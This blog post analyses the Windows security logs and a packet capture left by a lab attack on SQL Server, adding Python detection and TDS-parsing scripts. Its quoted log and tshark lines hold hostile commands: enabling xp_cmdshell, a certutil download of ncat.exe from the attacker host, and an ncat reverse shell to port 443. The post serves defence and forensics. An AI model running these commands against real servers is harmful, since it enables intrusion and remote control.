In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually, it surprised me instead. I was really hoping to see information such as the Workstation Name, Source Network Address and Source Port, especially when the Logon Type is reported as 3 below.
An account was successfully logged on.

Subject:
    Security ID:            NULL SID
    Account Name:           -
    Account Domain:         -
    Logon ID:               0x0

Logon Information:
    Logon Type:             3
    Restricted Admin Mode:  -
    Virtual Account:        No
    Elevated Token:         Yes

Impersonation Level:        Impersonation

New Logon:
    Security ID:            SECURITYNIK\sql-service
    Account Name:           sql-service
    Account Domain:         SECURITYNIK
    Logon ID:               0x4F4F11
    Linked Logon ID:        0x0
    Network Account Name:   -
    Network Account Domain: -
    Logon GUID:             {00000000-0000-0000-0000-000000000000}

Process Information:
    Process ID:             0x0
    Process Name:           -

Network Information:
    Workstation Name:       -
    Source Network Address: -
    Source Port:            -

Detailed Authentication Information:
    Logon Process:          NtLmSsp
    Authentication Package: NTLM
    Transited Services:     -
    Package Name (NTLM only): NTLM V2
    Key Length:             0
This event is generated when a logon session is created. It is generated on the computer that was accessed. This is event ID 4624, and a few of its fields explain the blanks. Logon Type 3 is a network logon, and Logon Process NtLmSsp with Authentication Package NTLM shows that the SQL Server login used Windows authentication over NTLM rather than Kerberos. Workstation Name is copied from the client's NTLM AUTHENTICATE message, and impacket sends an empty workstation name by default, so the field is "-". Source Network Address and Source Port are supplied to LSA by the service that performed the authentication, not by the network stack, and the blanks here show that sqlservr.exe did not pass the client address along. The client IP for a SQL Server login is recorded instead by SQL Server's own login auditing, as the "[CLIENT: x.x.x.x]" tag on the "Login succeeded for user" line in the SQL Server error log, and that line only exists for successful logins if login auditing is set to log both failed and successful logins (the default is failed logins only).
...
Looking at another entry did pique my interest though. Why would sqlservr.exe be spawning cmd.exe with the command line "C:\Windows\system32\cmd.exe" /c whoami? This is definitely more interesting than the above entry. It is also exactly what xp_cmdshell looks like from the endpoint: the Creator Process is sqlservr.exe and the Creator Subject is the SQL Server virtual service account NT SERVICE\MSSQL$SQLEXPRESS, because xp_cmdshell runs the command under the SQL Server service account rather than under the SQL login that issued it (unless a proxy account has been configured for non-sysadmin callers). Token Elevation Type %%1936 is TokenElevationTypeDefault, the normal value for a service token. The Process Command Line field is only populated because the audit policy to include the command line in process creation events (event ID 4688) was turned on; without it these entries would still show the parent and child but not the whoami.
A new process has been created.

Creator Subject:
    Security ID:            NT SERVICE\MSSQL$SQLEXPRESS
    Account Name:           MSSQL$SQLEXPRESS
    Account Domain:         NT Service
    Logon ID:               0x1718F

Target Subject:
    Security ID:            NULL SID
    Account Name:           -
    Account Domain:         -
    Logon ID:               0x0

Process Information:
    New Process ID:         0x123c
    New Process Name:       C:\Windows\System32\cmd.exe
    Token Elevation Type:   %%1936
    Mandatory Label:        Mandatory Label\High Mandatory Level
    Creator Process ID:     0xa04
    Creator Process Name:   C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line:   "C:\Windows\system32\cmd.exe" /c whoami
Next up, we see cmd.exe executing whoami. The Creator Process ID here, 0x123c, is the New Process ID of the cmd.exe in the previous entry, which is how the chain sqlservr.exe -> cmd.exe -> whoami.exe is reconstructed from 4688 events alone.
A new process has been created.

Creator Subject:
    Security ID:            NT SERVICE\MSSQL$SQLEXPRESS
    Account Name:           MSSQL$SQLEXPRESS
    Account Domain:         NT Service
    Logon ID:               0x1718F

Target Subject:
    Security ID:            NULL SID
    Account Name:           -
    Account Domain:         -
    Logon ID:               0x0

Process Information:
    New Process ID:         0x1724
    New Process Name:       C:\Windows\System32\whoami.exe
    Token Elevation Type:   %%1936
    Mandatory Label:        Mandatory Label\High Mandatory Level
    Creator Process ID:     0x123c
    Creator Process Name:   C:\Windows\System32\cmd.exe
    Process Command Line:   whoami
Here we see the Domain Admins group being enumerated, again through a cmd.exe spawned by sqlservr.exe.
A new process has been created.

Creator Subject:
    Security ID:            NT SERVICE\MSSQL$SQLEXPRESS
    Account Name:           MSSQL$SQLEXPRESS
    Account Domain:         NT Service
    Logon ID:               0x1718F

Target Subject:
    Security ID:            NULL SID
    Account Name:           -
    Account Domain:         -
    Logon ID:               0x0

Process Information:
    New Process ID:         0x360
    New Process Name:       C:\Windows\System32\cmd.exe
    Token Elevation Type:   %%1936
    Mandatory Label:        Mandatory Label\High Mandatory Level
    Creator Process ID:     0xa04
    Creator Process Name:   C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line:   "C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"
Here we see the host downloading ncat.exe via certutil. The -urlcache -f combination is a well-known living-off-the-land download technique, and because the command runs under the service account, %TEMP% resolves to that account's profile rather than to a user's.
A new process has been created.

Creator Subject:
    Security ID:            NT SERVICE\MSSQL$SQLEXPRESS
    Account Name:           MSSQL$SQLEXPRESS
    Account Domain:         NT Service
    Logon ID:               0x1718F

Target Subject:
    Security ID:            NULL SID
    Account Name:           -
    Account Domain:         -
    Logon ID:               0x0

Process Information:
    New Process ID:         0x1598
    New Process Name:       C:\Windows\System32\cmd.exe
    Token Elevation Type:   %%1936
    Mandatory Label:        Mandatory Label\High Mandatory Level
    Creator Process ID:     0xa04
    Creator Process Name:   C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line:   "C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
Here is what it looked like when ncat was executed. The path C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp is the 8.3 short form of the virtual service account's profile under C:\Windows\ServiceProfiles\MSSQL$SQLEXPRESS, which is where %TEMP% pointed for the previous certutil command. ncat connects back to 10.0.0.107 on port 443 over TLS with cmd.exe attached, so the shell traffic will not be readable in a capture. Note that the Creator Process ID, 0x1578, is a different cmd.exe from the ones above; it belongs to the separate xp_cmdshell call that launched ncat.
A new process has been created.

Creator Subject:
    Security ID:            NT SERVICE\MSSQL$SQLEXPRESS
    Account Name:           MSSQL$SQLEXPRESS
    Account Domain:         NT Service
    Logon ID:               0x1718F

Target Subject:
    Security ID:            NULL SID
    Account Name:           -
    Account Domain:         -
    Logon ID:               0x0

Process Information:
    New Process ID:         0xc6c
    New Process Name:       C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
    Token Elevation Type:   %%1936
    Mandatory Label:        Mandatory Label\High Mandatory Level
    Creator Process ID:     0x1578
    Creator Process Name:   C:\Windows\System32\cmd.exe
    Process Command Line:   C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe
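The parent and child relationships in these entries are the whole detection story, so here is an added example (my code, not from the original post or from any product) that parses 4688 messages and applies three rules: SQL Server spawning a shell, a certutil URL fetch on the command line, and execution out of a service profile's Temp directory. It then follows the Creator Process ID links to reconstruct each hit's ancestry. The sample messages are the events quoted above, cut down to the fields the rules use, plus one constructed benign event; the rule names, the shell list and the PID 0x777 event are my own choices.

```python
import re

# Sample 4688 messages.  The first four are the entries quoted in this post, cut
# down to the fields the rules use; the fifth is a constructed benign event.
SAMPLE_4688 = [
    r"""A new process has been created.
Process Information:
    New Process ID: 0x123c
    New Process Name: C:\Windows\System32\cmd.exe
    Creator Process ID: 0xa04
    Creator Process Name: C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line: "C:\Windows\system32\cmd.exe" /c whoami""",
    r"""A new process has been created.
Process Information:
    New Process ID: 0x1724
    New Process Name: C:\Windows\System32\whoami.exe
    Creator Process ID: 0x123c
    Creator Process Name: C:\Windows\System32\cmd.exe
    Process Command Line: whoami""",
    r"""A new process has been created.
Process Information:
    New Process ID: 0x1598
    New Process Name: C:\Windows\System32\cmd.exe
    Creator Process ID: 0xa04
    Creator Process Name: C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line: "C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe""",
    r"""A new process has been created.
Process Information:
    New Process ID: 0xc6c
    New Process Name: C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
    Creator Process ID: 0x1578
    Creator Process Name: C:\Windows\System32\cmd.exe
    Process Command Line: C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe""",
    r"""A new process has been created.
Process Information:
    New Process ID: 0x777
    New Process Name: C:\Windows\System32\notepad.exe
    Creator Process ID: 0x1234
    Creator Process Name: C:\Windows\explorer.exe
    Process Command Line: "C:\Windows\System32\notepad.exe" notes.txt""",
]

FIELD = re.compile(r"^\s*([^:]+?):\s*(.*)$")
PI = "Process Information/"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
CERTUTIL_FETCH = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)
SERVICE_TEMP = re.compile(r"\\(ServiceProfiles|SERVIC~1)\\.*\\Temp\\", re.I)


def parse_4688(message):
    """Map 'Section/Field' -> value.  A 'Name:' line with no value opens a section,
    which keeps the repeated Security ID / Account Name fields of a 4688 apart."""
    fields, section = {}, ""
    for line in message.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if value:
            fields[section + key] = value
        else:
            section = key + "/"
    return fields


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Rule tags for one event; an empty list means nothing matched."""
    parent = basename(ev.get(PI + "Creator Process Name", ""))
    new = ev.get(PI + "New Process Name", "")
    cmdline = ev.get(PI + "Process Command Line", "")
    tags = []
    if parent == "sqlservr.exe" and basename(new) in SHELLS:
        tags.append("sqlserver_spawned_shell")      # what xp_cmdshell looks like
    if CERTUTIL_FETCH.search(cmdline):
        tags.append("certutil_download")            # LOLBin fetch of a payload
    if SERVICE_TEMP.search(new):
        tags.append("exec_from_service_temp")       # binary run from a service profile's Temp
    return tags


def ancestry(events, pid):
    """Follow Creator Process ID -> New Process ID links back to the first parent
    that has no 4688 of its own (sqlservr.exe, started at boot).  Windows reuses
    PIDs, so on a real log restrict the walk to a time window around the event."""
    by_pid = {e[PI + "New Process ID"].lower(): e for e in events}
    chain, root, seen = [], None, set()
    while pid.lower() in by_pid and pid.lower() not in seen:
        seen.add(pid.lower())
        e = by_pid[pid.lower()]
        chain.append(basename(e[PI + "New Process Name"]))
        root, pid = basename(e[PI + "Creator Process Name"]), e[PI + "Creator Process ID"]
    return chain + [root] if root else chain


def analyze(messages):
    """PID -> (ancestry, tags) for every event at least one rule fired on."""
    events = [parse_4688(m) for m in messages]
    findings = {}
    for e in events:
        tags = classify(e)
        if tags:
            findings[e[PI + "New Process ID"]] = (ancestry(events, e[PI + "New Process ID"]), tags)
    return findings


if __name__ == "__main__":
    for pid, (chain, tags) in analyze(SAMPLE_4688).items():
        print(pid, " <- ".join(chain), tags)
```

The whoami entry itself fires no rule, which is the point of the ancestry walk: a single 4688 for whoami.exe under cmd.exe is noise, while the same event with sqlservr.exe two hops up is not. On a live system the same rules can be fed from Get-WinEvent or a SIEM; the text layout above is the one the Security log renders.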
While I was looking at the logs to see what transpired, I was also capturing packets using the following:
┌──(root💀securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel
Interestingly, I thought most of the communication was encrypted, but I was wrong. As I looked at a few packets, I could see the queries I executed. That is standard TDS behaviour: unless the server has Force Encryption turned on, the PRELOGIN exchange settles on ENCRYPT_OFF, which wraps only the LOGIN7 packet (the credentials) in TLS and then drops back to plaintext for every SQL batch and response that follows. impacket's client does exactly this, so the queries and their results are readable on the wire even though the login was not.
Looking at the type of packets captured. The four HTTP frames will be certutil fetching ncat.exe from 10.0.0.107, and the bulk of the TLS frames will be the ncat --ssl session to port 443 rather than the SQL traffic.
┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
        tds.prelogin                     frames:1 bytes:320
          tds.prelogin                   frames:1 bytes:320
      data                               frames:135 bytes:8100
      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================
Looking at the TDS messages, first up the SQL batch messages ("tds.type == 1"), which are the client's queries going to the server:
┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
....
Looking at some of the responses ("tds.type == 4"), which flow from the server back to the client:
┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021   10.0.0.5 → 10.0.0.107     TDS 91 Response
   15   0.111340   10.0.0.5 → 10.0.0.107     TDS 333 Response[Malformed Packet]
   17   0.129048   10.0.0.5 → 10.0.0.107     TDS 473 Response
   22  10.135335   10.0.0.5 → 10.0.0.107     TDS 666 Response
   26  17.489552   10.0.0.5 → 10.0.0.107     TDS 173 Response
   94 974.032998   10.0.0.5 → 10.0.0.107     TDS 294 Response
....
Looking at some of these messages, I see the commands I executed. The tds.query column is empty for the type 4 rows because that field only exists on SQL batch messages. The first batch, the pair of sp_configure calls that turns on xp_cmdshell, is a high-fidelity detection on its own, whether it is seen on the wire or as the "Configuration option 'xp_cmdshell' changed from 0 to 1" line that SQL Server writes to its error log.
┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | more
Running as user "root" and group "root". This could be dangerous.
tds.type    tds.query
4
4
4
1    exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;\r\n
4
1    exec master..xp_cmdshell 'whoami'\r\n
1    exec master..xp_cmdshell 'net users'\r\n
1    exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1    exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1    exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n
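To make the tds.type and tds.query fields concrete, here is an added example (my code, not impacket's and not Wireshark's dissector) that builds a TDS conversation from the batches quoted above and parses it back: an 8-byte header per packet, reassembly of multi-packet messages on the EOM status bit, UTF-16LE decoding of type 1 SQL batches, and removal of the TDS 7.2 ALL_HEADERS block that clients other than impacket prepend to a batch. The byte stream is constructed, the DONE token standing in for a server response is a placeholder, the "select name from sys.tables" batch and the tiny packet size are there only to exercise the reassembly, and the keyword watch list is my own.

```python
import struct

TDS_SQL_BATCH, TDS_RESPONSE, TDS_EOM = 1, 4, 0x01
HDR = struct.Struct(">BBHHBB")   # type, status, length, SPID, packet id, window (big-endian)
DANGEROUS = ("xp_cmdshell", "sp_configure", "sp_oacreate", "xp_regwrite")   # my watch list


def build_packets(msg_type, payload, packet_size=4096, spid=0):
    """Split one TDS message into packets: every packet but the last has status 0,
    the last sets the EOM bit, and the length field counts the 8-byte header."""
    chunk = packet_size - HDR.size
    pieces = [payload[i:i + chunk] for i in range(0, len(payload), chunk)] or [b""]
    out = b""
    for n, piece in enumerate(pieces):
        status = TDS_EOM if n == len(pieces) - 1 else 0
        out += HDR.pack(msg_type, status, HDR.size + len(piece), spid, (n + 1) & 0xFF, 0) + piece
    return out


def sql_batch(text, all_headers=False):
    """SQL batch payload: UTF-16LE text, optionally behind the TDS 7.2+ ALL_HEADERS
    block (22 bytes: total length 22, then an 18-byte transaction descriptor header)."""
    body = text.encode("utf-16-le")
    if all_headers:
        body = struct.pack("<IIHQI", 22, 18, 2, 0, 1) + body
    return body


def split_messages(stream):
    """Yield (type, payload) per complete TDS message, reassembling packets until
    EOM and stopping at a header whose length runs past the end of the data."""
    pos, msg_type, buf = 0, None, b""
    while pos + HDR.size <= len(stream):
        ptype, status, length, _spid, _pkt, _win = HDR.unpack_from(stream, pos)
        if length < HDR.size or pos + length > len(stream):
            break                                   # malformed or truncated packet
        msg_type = ptype if msg_type is None else msg_type
        buf += stream[pos + HDR.size:pos + length]
        pos += length
        if status & TDS_EOM:
            yield msg_type, buf
            msg_type, buf = None, b""


def batch_text(payload):
    """Decode a SQL batch.  ALL_HEADERS is recognised by the NUL bytes at offset
    2..3 of its length field; a UTF-16LE SQL string never has a NUL code unit there."""
    if len(payload) >= 4 and payload[2:4] == b"\x00\x00":
        n = struct.unpack_from("<I", payload)[0]
        if 4 <= n <= len(payload):
            payload = payload[n:]
    return payload.decode("utf-16-le", errors="replace")


def extract_queries(stream):
    """(query text, matched keywords) for every SQL batch; responses are skipped."""
    out = []
    for msg_type, payload in split_messages(stream):
        if msg_type == TDS_SQL_BATCH:
            text = batch_text(payload).rstrip("\r\n")
            out.append((text, [k for k in DANGEROUS if k in text.lower()]))
    return out


# Constructed conversation: the first three batches are the ones quoted in this
# post, sent as impacket sends them (text + "\r\n", no ALL_HEADERS); then a
# placeholder server response; then a batch with ALL_HEADERS, split across
# several packets by an artificially small packet size to exercise reassembly.
QUERIES = [
    "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
    "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
    "exec master..xp_cmdshell 'whoami'",
    "exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\\ncat.exe'",
    "select name from sys.tables",
]
STREAM = (
    build_packets(TDS_SQL_BATCH, sql_batch(QUERIES[0] + "\r\n"))
    + build_packets(TDS_SQL_BATCH, sql_batch(QUERIES[1] + "\r\n"))
    + build_packets(TDS_RESPONSE, b"\xfd" + bytes(12))     # DONE token, placeholder
    + build_packets(TDS_SQL_BATCH, sql_batch(QUERIES[2] + "\r\n"))
    + build_packets(TDS_SQL_BATCH, sql_batch(QUERIES[3], all_headers=True), packet_size=40)
)

if __name__ == "__main__":
    for text, flags in extract_queries(STREAM):
        print(f"{'!! ' if flags else '   '}{text}   {flags}")
```

The trailing "\r\n" on each tds.query row above is impacket appending a line ending to every batch, which is why the decoder strips it. On a real capture the stream handed to split_messages would be the reassembled TCP payload in one direction, and the truncation check matters: the malformed response in frame 15 above is the kind of packet that should stop the parser rather than shift every later message.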
I was able to see the responses also. However, in most cases it does not really make sense to post them here.
Ok, that's it for me and this post.